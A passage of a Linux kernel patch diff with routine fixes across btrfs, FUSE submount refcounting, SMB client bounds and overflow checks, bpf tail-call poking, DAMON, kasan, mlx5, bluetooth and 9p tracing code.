+-		space_info->bytes_zone_unusable -= block_group->zone_capacity;
+-	}
+ 	spin_unlock(&block_group->lock);
+-	btrfs_try_granting_tickets(fs_info, space_info);
+-	spin_unlock(&space_info->lock);
+ 
+ 	/* For the active block group list */
+ 	btrfs_get_block_group(block_group);
+@@ -1943,7 +1924,6 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ out_unlock:
+ 	spin_unlock(&block_group->lock);
+-	spin_unlock(&space_info->lock);
+ 	return ret;
+ }
+ 
+diff --git a/fs/fuse/fuse_i.h b/fs/fuse/fuse_i.h
+index 98a9cf5318731..a9681fecbd91f 100644
+--- a/fs/fuse/fuse_i.h
++++ b/fs/fuse/fuse_i.h
+@@ -63,6 +63,19 @@ struct fuse_forget_link {
+ 	struct fuse_forget_link *next;
+ };
+ 
++/* Submount lookup tracking */
++struct fuse_submount_lookup {
++	/** Refcount */
++	refcount_t count;
++
++	/** Unique ID, which identifies the inode between userspace
++	 * and kernel */
++	u64 nodeid;
++
++	/** The request used for sending the FORGET message */
++	struct fuse_forget_link *forget;
++};
++
+ /** FUSE inode */
+ struct fuse_inode {
+ 	/** Inode data */
+@@ -155,6 +168,8 @@ struct fuse_inode {
+ 	 */
+ 	struct fuse_inode_dax *dax;
+ #endif
++	/** Submount specific lookup tracking */
++	struct fuse_submount_lookup *submount_lookup;
+ };
+ 
+ /** FUSE inode state bits */
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index bc3c3e76c646d..f81000d968875 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -68,6 +68,24 @@ struct fuse_forget_link *fuse_alloc_forget(void)
+ 	return kzalloc(sizeof(struct fuse_forget_link), GFP_KERNEL_ACCOUNT);
+ }
+ 
++static struct fuse_submount_lookup *fuse_alloc_submount_lookup(void)
++{
++	struct fuse_submount_lookup *sl;
++
++	sl = kzalloc(sizeof(struct fuse_submount_lookup), GFP_KERNEL_ACCOUNT);
++	if (!sl)
++		return NULL;
++	sl->forget = fuse_alloc_forget();
++	if (!sl->forget)
++		goto out_free;
++
++	return sl;
++
++out_free:
++	kfree(sl);
++	return NULL;
++}
++
+ static struct inode *fuse_alloc_inode(struct super_block *sb)
+ {
+ 	struct fuse_inode *fi;
+@@ -83,6 +101,7 @@ static struct inode *fuse_alloc_inode(struct super_block *sb)
+ 	fi->attr_version = 0;
+ 	fi->orig_ino = 0;
+ 	fi->state = 0;
++	fi->submount_lookup = NULL;
+ 	mutex_init(&fi->mutex);
+ 	spin_lock_init(&fi->lock);
+ 	fi->forget = fuse_alloc_forget();
+@@ -113,6 +132,17 @@ static void fuse_free_inode(struct inode *inode)
+ 	kmem_cache_free(fuse_inode_cachep, fi);
+ }
+ 
++static void fuse_cleanup_submount_lookup(struct fuse_conn *fc,
++					 struct fuse_submount_lookup *sl)
++{
++	if (!refcount_dec_and_test(&sl->count))
++		return;
++
++	fuse_queue_forget(fc, sl->forget, sl->nodeid, 1);
++	sl->forget = NULL;
++	kfree(sl);
++}
++
+ static void fuse_evict_inode(struct inode *inode)
+ {
+ 	struct fuse_inode *fi = get_fuse_inode(inode);
+@@ -132,6 +162,11 @@ static void fuse_evict_inode(struct inode *inode)
+ 					  fi->nlookup);
+ 			fi->forget = NULL;
+ 		}
++
++		if (fi->submount_lookup) {
++			fuse_cleanup_submount_lookup(fc, fi->submount_lookup);
++			fi->submount_lookup = NULL;
++		}
+ 	}
+ 	if (S_ISREG(inode->i_mode) && !fuse_is_bad(inode)) {
+ 		WARN_ON(!list_empty(&fi->write_files));
+@@ -311,6 +346,13 @@ void fuse_change_attributes(struct inode *inode, struct fuse_attr *attr,
+ 		fuse_dax_dontcache(inode, attr->flags);
+ }
+ 
++static void fuse_init_submount_lookup(struct fuse_submount_lookup *sl,
++				      u64 nodeid)
++{
++	sl->nodeid = nodeid;
++	refcount_set(&sl->count, 1);
++}
++
+ static void fuse_init_inode(struct inode *inode, struct fuse_attr *attr)
+ {
+ 	inode->i_mode = attr->mode & S_IFMT;
+@@ -368,12 +410,22 @@ struct inode *fuse_iget(struct super_block *sb, u64 nodeid,
+ 	 */
+ 	if (fc->auto_submounts && (attr->flags & FUSE_ATTR_SUBMOUNT) &&
+ 	    S_ISDIR(attr->mode)) {
++		struct fuse_inode *fi;
++
+ 		inode = new_inode(sb);
+ 		if (!inode)
+ 			return NULL;
+ 
+ 		fuse_init_inode(inode, attr);
+-		get_fuse_inode(inode)->nodeid = nodeid;
++		fi = get_fuse_inode(inode);
++		fi->nodeid = nodeid;
++		fi->submount_lookup = fuse_alloc_submount_lookup();
++		if (!fi->submount_lookup) {
++			iput(inode);
++			return NULL;
++		}
++		/* Sets nlookup = 1 on fi->submount_lookup->nlookup */
++		fuse_init_submount_lookup(fi->submount_lookup, nodeid);
+ 		inode->i_flags |= S_AUTOMOUNT;
+ 		goto done;
+ 	}
+@@ -396,11 +448,11 @@ retry:
+ 		iput(inode);
+ 		goto retry;
+ 	}
+-done:
+ 	fi = get_fuse_inode(inode);
+ 	spin_lock(&fi->lock);
+ 	fi->nlookup++;
+ 	spin_unlock(&fi->lock);
++done:
+ 	fuse_change_attributes(inode, attr, attr_valid, attr_version);
+ 
+ 	return inode;
+@@ -1439,6 +1491,8 @@ static int fuse_fill_super_submount(struct super_block *sb,
+ 	struct super_block *parent_sb = parent_fi->inode.i_sb;
+ 	struct fuse_attr root_attr;
+ 	struct inode *root;
++	struct fuse_submount_lookup *sl;
++	struct fuse_inode *fi;
+ 
+ 	fuse_sb_defaults(sb);
+ 	fm->sb = sb;
+@@ -1461,12 +1515,27 @@ static int fuse_fill_super_submount(struct super_block *sb,
+ 	 * its nlookup should not be incremented.  fuse_iget() does
+ 	 * that, though, so undo it here.
+ 	 */
+-	get_fuse_inode(root)->nlookup--;
++	fi = get_fuse_inode(root);
++	fi->nlookup--;
++
+ 	sb->s_d_op = &fuse_dentry_operations;
+ 	sb->s_root = d_make_root(root);
+ 	if (!sb->s_root)
+ 		return -ENOMEM;
+ 
++	/*
++	 * Grab the parent's submount_lookup pointer and take a
++	 * reference on the shared nlookup from the parent.  This is to
++	 * prevent the last forget for this nodeid from getting
++	 * triggered until all users have finished with it.
++	 */
++	sl = parent_fi->submount_lookup;
++	WARN_ON(!sl);
++	if (sl) {
++		refcount_inc(&sl->count);
++		fi->submount_lookup = sl;
++	}
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index 0acb455368f23..5df8d93233376 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -38,11 +38,13 @@ void cifs_dump_detail(void *buf, struct TCP_Server_Info *server)
+ #ifdef CONFIG_CIFS_DEBUG2
+ 	struct smb_hdr *smb = buf;
+ 
+-	cifs_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Flgs2: 0x%x Mid: %d Pid: %d\n",
+-		 smb->Command, smb->Status.CifsError,
+-		 smb->Flags, smb->Flags2, smb->Mid, smb->Pid);
+-	cifs_dbg(VFS, "smb buf %p len %u\n", smb,
+-		 server->ops->calc_smb_size(smb));
++	cifs_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Flgs2: 0x%x Mid: %d Pid: %d Wct: %d\n",
++		 smb->Command, smb->Status.CifsError, smb->Flags,
++		 smb->Flags2, smb->Mid, smb->Pid, smb->WordCount);
++	if (!server->ops->check_message(buf, server->total_read, server)) {
++		cifs_dbg(VFS, "smb buf %p len %u\n", smb,
++			 server->ops->calc_smb_size(smb));
++	}
+ #endif /* CONFIG_CIFS_DEBUG2 */
+ }
+ 
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 2e814eadd6aef..512ac9dea9787 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -513,7 +513,8 @@ struct smb_version_operations {
+ 				 struct mid_q_entry **, char **, int *);
+ 	enum securityEnum (*select_sectype)(struct TCP_Server_Info *,
+ 			    enum securityEnum);
+-	int (*next_header)(char *);
++	int (*next_header)(struct TCP_Server_Info *server, char *buf,
++			   unsigned int *noff);
+ 	/* ioctl passthrough for query_info */
+ 	int (*ioctl_query_info)(const unsigned int xid,
+ 				struct cifs_tcon *tcon,
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 5b19918938346..f725a119ce312 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -1225,7 +1225,12 @@ next_pdu:
+ 		server->total_read += length;
+ 
+ 		if (server->ops->next_header) {
+-			next_offset = server->ops->next_header(buf);
++			if (server->ops->next_header(server, buf, &next_offset)) {
++				cifs_dbg(VFS, "%s: malformed response (next_offset=%u)\n",
++					 __func__, next_offset);
++				cifs_reconnect(server, true);
++				continue;
++			}
+ 			if (next_offset)
+ 				server->pdu_size = next_offset;
+ 		}
+diff --git a/fs/smb/client/misc.c b/fs/smb/client/misc.c
+index 31e06133acc3d..41290c12d0bcc 100644
+--- a/fs/smb/client/misc.c
++++ b/fs/smb/client/misc.c
+@@ -350,6 +350,10 @@ checkSMB(char *buf, unsigned int total_read, struct TCP_Server_Info *server)
+ 			cifs_dbg(VFS, "Length less than smb header size\n");
+ 		}
+ 		return -EIO;
++	} else if (total_read < sizeof(*smb) + 2 * smb->WordCount) {
++		cifs_dbg(VFS, "%s: can't read BCC due to invalid WordCount(%u)\n",
++			 __func__, smb->WordCount);
++		return -EIO;
+ 	}
+ 
+ 	/* otherwise, there is enough to get to the BCC */
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 1b3489a2f0db7..df03d80ab6d5f 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -5196,17 +5196,22 @@ smb3_handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+ 				NULL, 0, 0, false);
+ }
+ 
+-static int
+-smb2_next_header(char *buf)
++static int smb2_next_header(struct TCP_Server_Info *server, char *buf,
++			    unsigned int *noff)
+ {
+ 	struct smb2_hdr *hdr = (struct smb2_hdr *)buf;
+ 	struct smb2_transform_hdr *t_hdr = (struct smb2_transform_hdr *)buf;
+ 
+-	if (hdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM)
+-		return sizeof(struct smb2_transform_hdr) +
+-		  le32_to_cpu(t_hdr->OriginalMessageSize);
+-
+-	return le32_to_cpu(hdr->NextCommand);
++	if (hdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
++		*noff = le32_to_cpu(t_hdr->OriginalMessageSize);
++		if (unlikely(check_add_overflow(*noff, sizeof(*t_hdr), noff)))
++			return -EINVAL;
++	} else {
++		*noff = le32_to_cpu(hdr->NextCommand);
++	}
++	if (unlikely(*noff && *noff < MID_HEADER_SIZE(server)))
++		return -EINVAL;
++	return 0;
+ }
+ 
+ static int
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index 847d69d327c2a..05ff8a457a3d7 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -372,10 +372,15 @@ static int __smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
+ 				 void **request_buf, unsigned int *total_len)
+ {
+ 	/* BB eventually switch this to SMB2 specific small buf size */
+-	if (smb2_command == SMB2_SET_INFO)
++	switch (smb2_command) {
++	case SMB2_SET_INFO:
++	case SMB2_QUERY_INFO:
+ 		*request_buf = cifs_buf_get();
+-	else
++		break;
++	default:
+ 		*request_buf = cifs_small_buf_get();
++		break;
++	}
+ 	if (*request_buf == NULL) {
+ 		/* BB should we add a retry in here if not a writepage? */
+ 		return -ENOMEM;
+@@ -3523,8 +3528,13 @@ SMB2_query_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+ 	struct smb2_query_info_req *req;
+ 	struct kvec *iov = rqst->rq_iov;
+ 	unsigned int total_len;
++	size_t len;
+ 	int rc;
+ 
++	if (unlikely(check_add_overflow(input_len, sizeof(*req), &len) ||
++		     len > CIFSMaxBufSize))
++		return -EINVAL;
++
+ 	rc = smb2_plain_req_init(SMB2_QUERY_INFO, tcon, server,
+ 				 (void **) &req, &total_len);
+ 	if (rc)
+@@ -3546,7 +3556,7 @@ SMB2_query_info_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
+ 
+ 	iov[0].iov_base = (char *)req;
+ 	/* 1 for Buffer */
+-	iov[0].iov_len = total_len - 1 + input_len;
++	iov[0].iov_len = len;
+ 	return 0;
+ }
+ 
+@@ -3554,7 +3564,7 @@ void
+ SMB2_query_info_free(struct smb_rqst *rqst)
+ {
+ 	if (rqst && rqst->rq_iov)
+-		cifs_small_buf_release(rqst->rq_iov[0].iov_base); /* request */
++		cifs_buf_release(rqst->rq_iov[0].iov_base); /* request */
+ }
+ 
+ static int
+@@ -5439,6 +5449,11 @@ build_qfs_info_req(struct kvec *iov, struct cifs_tcon *tcon,
+ 	return 0;
+ }
+ 
++static inline void free_qfs_info_req(struct kvec *iov)
++{
++	cifs_buf_release(iov->iov_base);
++}
++
+ int
+ SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 	      u64 persistent_fid, u64 volatile_fid, struct kstatfs *fsdata)
+@@ -5470,7 +5485,7 @@ SMB311_posix_qfs_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+ 			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
++	free_qfs_info_req(&iov);
+ 	if (rc) {
+ 		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+ 		goto posix_qfsinf_exit;
+@@ -5521,7 +5536,7 @@ SMB2_QFS_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+ 			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
++	free_qfs_info_req(&iov);
+ 	if (rc) {
+ 		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+ 		goto qfsinf_exit;
+@@ -5588,7 +5603,7 @@ SMB2_QFS_attr(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+ 			    &rqst, &resp_buftype, flags, &rsp_iov);
+-	cifs_small_buf_release(iov.iov_base);
++	free_qfs_info_req(&iov);
+ 	if (rc) {
+ 		cifs_stats_fail_inc(tcon, SMB2_QUERY_INFO_HE);
+ 		goto qfsattr_exit;
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 6b7d95b65f4b6..f4728e65d1bda 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -65,6 +65,7 @@ static void do_insert_old_idx(struct ubifs_info *c,
+ 		else {
+ 			ubifs_err(c, "old idx added twice!");
+ 			kfree(old_idx);
++			return;
+ 		}
+ 	}
+ 	rb_link_node(&old_idx->rb, parent, p);
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 1fba826f0acef..3ce9e39ecdb85 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -2681,6 +2681,9 @@ enum bpf_text_poke_type {
+ int bpf_arch_text_poke(void *ip, enum bpf_text_poke_type t,
+ 		       void *addr1, void *addr2);
+ 
++void bpf_arch_poke_desc_update(struct bpf_jit_poke_descriptor *poke,
++			       struct bpf_prog *new, struct bpf_prog *old);
++
+ void *bpf_arch_text_copy(void *dst, void *src, size_t len);
+ int bpf_arch_text_invalidate(void *dst, size_t len);
+ 
+diff --git a/include/linux/damon.h b/include/linux/damon.h
+index b13be7ae2275e..e6941b239f449 100644
+--- a/include/linux/damon.h
++++ b/include/linux/damon.h
+@@ -8,6 +8,7 @@
+ #ifndef _DAMON_H_
+ #define _DAMON_H_
+ 
++#include <linux/completion.h>
+ #include <linux/mutex.h>
+ #include <linux/time64.h>
+ #include <linux/types.h>
+@@ -452,6 +453,8 @@ struct damon_ctx {
+ /* private: internal use only */
+ 	struct timespec64 last_aggregation;
+ 	struct timespec64 last_ops_update;
++	/* for waiting until the execution of the kdamond_fn is started */
++	struct completion kdamond_started;
+ 
+ /* public: */
+ 	struct task_struct *kdamond;
+diff --git a/include/linux/dm-bufio.h b/include/linux/dm-bufio.h
+index 1262d92ab88fc..2e71ca35942e9 100644
+--- a/include/linux/dm-bufio.h
++++ b/include/linux/dm-bufio.h
+@@ -37,6 +37,8 @@ dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
+  */
+ void dm_bufio_client_destroy(struct dm_bufio_client *c);
+ 
++void dm_bufio_client_reset(struct dm_bufio_client *c);
++
+ /*
+  * Set the sector range.
+  * When this function is called, there must be no I/O in progress on the bufio
+diff --git a/include/linux/kasan.h b/include/linux/kasan.h
+index 6e6f0238d63cc..4603e6e30c0ea 100644
+--- a/include/linux/kasan.h
++++ b/include/linux/kasan.h
+@@ -471,10 +471,10 @@ static inline void kasan_free_module_shadow(const struct vm_struct *vm) {}
+ 
+ #endif /* (CONFIG_KASAN_GENERIC || CONFIG_KASAN_SW_TAGS) && !CONFIG_KASAN_VMALLOC */
+ 
+-#ifdef CONFIG_KASAN
++#if defined(CONFIG_KASAN_GENERIC) || defined(CONFIG_KASAN_SW_TAGS)
+ void kasan_non_canonical_hook(unsigned long addr);
+-#else /* CONFIG_KASAN */
++#else /* CONFIG_KASAN_GENERIC || CONFIG_KASAN_SW_TAGS */
+ static inline void kasan_non_canonical_hook(unsigned long addr) { }
+-#endif /* CONFIG_KASAN */
++#endif /* CONFIG_KASAN_GENERIC || CONFIG_KASAN_SW_TAGS */
+ 
+ #endif /* LINUX_KASAN_H */
+diff --git a/include/linux/key-type.h b/include/linux/key-type.h
+index 7d985a1dfe4af..5caf3ce823733 100644
+--- a/include/linux/key-type.h
++++ b/include/linux/key-type.h
+@@ -73,6 +73,7 @@ struct key_type {
+ 
+ 	unsigned int flags;
+ #define KEY_TYPE_NET_DOMAIN	0x00000001 /* Keys of this type have a net namespace domain */
++#define KEY_TYPE_INSTANT_REAP	0x00000002 /* Keys of this type don't have a delay after expiring */
+ 
+ 	/* vet a description */
+ 	int (*vet_description)(const char *description);
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index 3660ce6a93496..93ec34a94b724 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -282,18 +282,23 @@ struct mlx5_cmd_stats {
+ struct mlx5_cmd {
+ 	struct mlx5_nb    nb;
+ 
++	/* members which needs to be queried or reinitialized each reload */
++	struct {
++		u16		cmdif_rev;
++		u8		log_sz;
++		u8		log_stride;
++		int		max_reg_cmds;
++		unsigned long	bitmask;
++		struct semaphore sem;
++		struct semaphore pages_sem;
++		struct semaphore throttle_sem;
++	} vars;
+ 	enum mlx5_cmdif_state	state;
+ 	void	       *cmd_alloc_buf;
+ 	dma_addr_t	alloc_dma;
+ 	int		alloc_size;
+ 	void	       *cmd_buf;
+ 	dma_addr_t	dma;
+-	u16		cmdif_rev;
+-	u8		log_sz;
+-	u8		log_stride;
+-	int		max_reg_cmds;
+-	int		events;
+-	u32 __iomem    *vector;
+ 
+ 	/* protect command queue allocations
+ 	 */
+@@ -303,11 +308,8 @@ struct mlx5_cmd {
+ 	 */
+ 	spinlock_t	token_lock;
+ 	u8		token;
+-	unsigned long	bitmask;
+ 	char		wq_name[MLX5_CMD_WQ_MAX_NAME];
+ 	struct workqueue_struct *wq;
+-	struct semaphore sem;
+-	struct semaphore pages_sem;
+ 	int	mode;
+ 	u16     allowed_opcode;
+ 	struct mlx5_cmd_work_ent *ent_arr[MLX5_MAX_COMMANDS];
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 583aebd8c1e01..5f8a534b65746 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -187,6 +187,7 @@ struct blocked_key {
+ struct smp_csrk {
+ 	bdaddr_t bdaddr;
+ 	u8 bdaddr_type;
++	u8 link_type;
+ 	u8 type;
+ 	u8 val[16];
+ };
+@@ -196,6 +197,7 @@ struct smp_ltk {
+ 	struct rcu_head rcu;
+ 	bdaddr_t bdaddr;
+ 	u8 bdaddr_type;
++	u8 link_type;
+ 	u8 authenticated;
+ 	u8 type;
+ 	u8 enc_size;
+@@ -210,6 +212,7 @@ struct smp_irk {
+ 	bdaddr_t rpa;
+ 	bdaddr_t bdaddr;
+ 	u8 addr_type;
++	u8 link_type;
+ 	u8 val[16];
+ };
+ 
+@@ -217,6 +220,8 @@ struct link_key {
+ 	struct list_head list;
+ 	struct rcu_head rcu;
+ 	bdaddr_t bdaddr;
++	u8 bdaddr_type;
++	u8 link_type;
+ 	u8 type;
+ 	u8 val[HCI_LINK_KEY_SIZE];
+ 	u8 pin_len;
+diff --git a/include/trace/events/9p.h b/include/trace/events/9p.h
+index 4dfa6d7f83baa..cd104a1343e2d 100644
+--- a/include/trace/events/9p.h
++++ b/include/trace/events/9p.h
+@@ -178,18 +178,21 @@ TRACE_EVENT(9p_protocol_dump,
+ 		    __field(	void *,		clnt				)
+ 		    __field(	__u8,		type				)
+ 		    __field(	__u16,		tag				)
+-		    __array(	unsigned char,	line,	P9_PROTO_DUMP_SZ	)
++		    __dynamic_array(unsigned char, line,
++				min_t(size_t, pdu->capacity, P9_PROTO_DUMP_SZ))
+ 		    ),
+ 
+ 	    TP_fast_assign(
+ 		    __entry->clnt   =  clnt;
+ 		    __entry->type   =  pdu->id;
+ 		    __entry->tag    =  pdu->tag;
+-		    memcpy(__entry->line, pdu->sdata, P9_PROTO_DUMP_SZ);
++		    memcpy(__get_dynamic_array(line), pdu->sdata,
++				__get_dynamic_array_len(line));
+ 		    ),
+-	    TP_printk("clnt %lu %s(tag = %d)\n%.3x: %16ph\n%.3x: %16ph\n",
++	    TP_printk("clnt %lu %s(tag = %d)\n%*ph\n",
+ 		      (unsigned long)__entry->clnt, show_9p_op(__entry->type),
+-		      __entry->tag, 0, __entry->line, 16, __entry->line + 16)
++		      __entry->tag, __get_dynamic_array_len(line),
++		      __get_dynamic_array(line))
+  );
+ 
+ 
+diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
+index 832b2659e96e2..00f23febb9a7d 100644
+--- a/kernel/bpf/arraymap.c
++++ b/kernel/bpf/arraymap.c
+@@ -997,11 +997,16 @@ static void prog_array_map_poke_untrack(struct bpf_map *map,
+ 	mutex_unlock(&aux->poke_mutex);
+ }
+ 
++void __weak bpf_arch_poke_desc_update(struct bpf_jit_poke_descriptor *poke,
++				      struct bpf_prog *new, struct bpf_prog *old)
++{
++	WARN_ON_ONCE(1);
++}
++
+ static void prog_array_map_poke_run(struct bpf_map *map, u32 key,
+ 				    struct bpf_prog *old,
+ 				    struct bpf_prog *new)
+ {
+-	u8 *old_addr, *new_addr, *old_bypass_addr;
+ 	struct prog_poke_elem *elem;
+ 	struct bpf_array_aux *aux;
+ 
+@@ -1010,7 +1015,7 @@ static void prog_array_map_poke_run(struct bpf_map *map, u32 key,
+ 
+ 	list_for_each_entry(elem, &aux->poke_progs, list) {
+ 		struct bpf_jit_poke_descriptor *poke;
+-		int i, ret;
++		int i;
+ 
+ 		for (i = 0; i < elem->aux->size_poke_tab; i++) {
+ 			poke = &elem->aux->poke_tab[i];
+@@ -1029,21 +1034,10 @@ static void prog_array_map_poke_run(struct bpf_map *map, u32 key,
+ 			 *    activated, so tail call updates can arrive from here
+ 			 *    while JIT is still finishing its final fixup for
+ 			 *    non-activated poke entries.
+-			 * 3) On program teardown, the program's kallsym entry gets
+-			 *    removed out of RCU callback, but we can only untrack
+-			 *    from sleepable context, therefore bpf_arch_text_poke()
+-			 *    might not see that this is in BPF text section and
+-			 *    bails out with -EINVAL. As these are unreachable since
+-			 *    RCU grace period already passed, we simply skip them.
+-			 * 4) Also programs reaching refcount of zero while patching
++			 * 3) Also programs reaching refcount of zero while patching
+ 			 *    is in progress is okay since we're protected under
+ 			 *    poke_mutex and untrack the programs before the JIT
+-			 *    buffer is freed. When we're still in the middle of
+-			 *    patching and suddenly kallsyms entry of the program
+-			 *    gets evicted, we just skip the rest which is fine due
+-			 *    to point 3).
+-			 * 5) Any other error happening below from bpf_arch_text_poke()
+-			 *    is a unexpected bug.
++			 *    buffer is freed.
+ 			 */
+ 			if (!READ_ONCE(poke->tailcall_target_stable))
+ 				continue;
+@@ -1053,39 +1047,7 @@ static void prog_array_map_poke_run(struct bpf_map *map, u32 key,
+ 			    poke->tail_call.key != key)
+ 				continue;
+ 
+-			old_bypass_addr = old ? NULL : poke->bypass_addr;
+-			old_addr = old ? (u8 *)old->bpf_func + poke->adj_off : NULL;
+-			new_addr = new ? (u8 *)new->bpf_func + poke->adj_off : NULL;
+-
+-			if (new) {
+-				ret = bpf_arch_text_poke(poke->tailcall_target,
+-							 BPF_MOD_JUMP,
+-							 old_addr, new_addr);
+-				BUG_ON(ret < 0 && ret != -EINVAL);
+-				if (!old) {
+-					ret = bpf_arch_text_poke(poke->tailcall_bypass,
+-								 BPF_MOD_JUMP,
+-								 poke->bypass_addr,
+-								 NULL);
+-					BUG_ON(ret < 0 && ret != -EINVAL);
+-				}
+-			} else {
+-				ret = bpf_arch_text_poke(poke->tailcall_bypass,
+-							 BPF_MOD_JUMP,
+-							 old_bypass_addr,
+-							 poke->bypass_addr);
+-				BUG_ON(ret < 0 && ret != -EINVAL);
+-				/* let other CPUs finish the execution of program
+-				 * so that it will not possible to expose them
+-				 * to invalid nop, stack unwind, nop state
+-				 */
+-				if (!ret)
+-					synchronize_rcu();
+-				ret = bpf_arch_text_poke(poke->tailcall_target,
+-							 BPF_MOD_JUMP,
+-							 old_addr, NULL);
+-				BUG_ON(ret < 0 && ret != -EINVAL);
+-			}
++			bpf_arch_poke_desc_update(poke, new, old);
+ 		}
+ 	}
+ }
+diff --git a/kernel/trace/synth_event_gen_test.c b/kernel/trace/synth_event_gen_test.c
+index 8d77526892f45..d944924cd1e1c 100644
+--- a/kernel/trace/synth_event_gen_test.c
++++ b/kernel/trace/synth_event_gen_test.c
+@@ -477,6 +477,17 @@ static int __init synth_event_gen_test_init(void)
+ 
+ 	ret = test_trace_synth_event();
+ 	WARN_ON(ret);
++
++	/* Disable when done */
++	trace_array_set_clr_event(gen_synth_test->tr,
++				  "synthetic",
++				  "gen_synth_test", false);
++	trace_array_set_clr_event(empty_synth_test->tr,
++				  "synthetic",
++				  "empty_synth_test", false);
++	trace_array_set_clr_event(create_synth_test->tr,
++				  "synthetic",
++				  "create_synth_test", false);
+  out:
+ 	return ret;
+ }
+diff --git a/lib/vsprintf.c b/lib/vsprintf.c
+index 24f37bab8bc1f..fa1c197018551 100644
+--- a/lib/vsprintf.c
++++ b/lib/vsprintf.c
+@@ -2092,15 +2092,20 @@ char *fwnode_full_name_string(struct fwnode_handle *fwnode, char *buf,
+ 
+ 	/* Loop starting from the root node to the current node. */
+ 	for (depth = fwnode_count_parents(fwnode); depth >= 0; depth--) {
+-		struct fwnode_handle *__fwnode =
+-			fwnode_get_nth_parent(fwnode, depth);
++		/*
++		 * Only get a reference for other nodes (i.e. parent nodes).
++		 * fwnode refcount may be 0 here.
++		 */
++		struct fwnode_handle *__fwnode = depth ?
++			fwnode_get_nth_parent(fwnode, depth) : fwnode;
+ 
+ 		buf = string(buf, end, fwnode_get_name_prefix(__fwnode),
+ 			     default_str_spec);
+ 		buf = string(buf, end, fwnode_get_name(__fwnode),
+ 			     default_str_spec);
+ 
+-		fwnode_handle_put(__fwnode);
++		if (depth)
++			fwnode_handle_put(__fwnode);
+ 	}
+ 
+ 	return buf;
+diff --git a/mm/damon/core.c b/mm/damon/core.c
+index 36d098d06c558..5db9bec8ae67c 100644
+--- a/mm/damon/core.c
++++ b/mm/damon/core.c
+@@ -383,6 +383,8 @@ struct damon_ctx *damon_new_ctx(void)
+ 	if (!ctx)
+ 		return NULL;
+ 
++	init_completion(&ctx->kdamond_started);
++
+ 	ctx->attrs.sample_interval = 5 * 1000;
+ 	ctx->attrs.aggr_interval = 100 * 1000;
+ 	ctx->attrs.ops_update_interval = 60 * 1000 * 1000;
+@@ -519,11 +521,14 @@ static int __damon_start(struct damon_ctx *ctx)
+ 	mutex_lock(&ctx->kdamond_lock);
+ 	if (!ctx->kdamond) {
+ 		err = 0;
++		reinit_completion(&ctx->kdamond_started);
+ 		ctx->kdamond = kthread_run(kdamond_fn, ctx, "kdamond.%d",
+ 				nr_running_ctxs);
+ 		if (IS_ERR(ctx->kdamond)) {
+ 			err = PTR_ERR(ctx->kdamond);
+ 			ctx->kdamond = NULL;
++		} else {
++			wait_for_completion(&ctx->kdamond_started);
+ 		}
+ 	}
+ 	mutex_unlock(&ctx->kdamond_lock);
+@@ -1147,6 +1152,8 @@ static int kdamond_fn(void *data)
+ 
+ 	pr_debug("kdamond (%d) starts\n", current->pid);
+ 
++	complete(&ctx->kdamond_started);
++
+ 	if (ctx->ops.init)
+ 		ctx->ops.init(ctx);
+ 	if (ctx->callback.before_start && ctx->callback.before_start(ctx))
+diff --git a/mm/kasan/report.c b/mm/kasan/report.c
+index 66a37f177d231..5d9ae80df4954 100644
+--- a/mm/kasan/report.c
++++ b/mm/kasan/report.c
+@@ -523,8 +523,9 @@ void kasan_report_async(void)
+ }
+ #endif /* CONFIG_KASAN_HW_TAGS */
+ 
++#if defined(CONFIG_KASAN_GENERIC) || defined(CONFIG_KASAN_SW_TAGS)
+ /*
+- * With CONFIG_KASAN, accesses to bogus pointers (outside the high
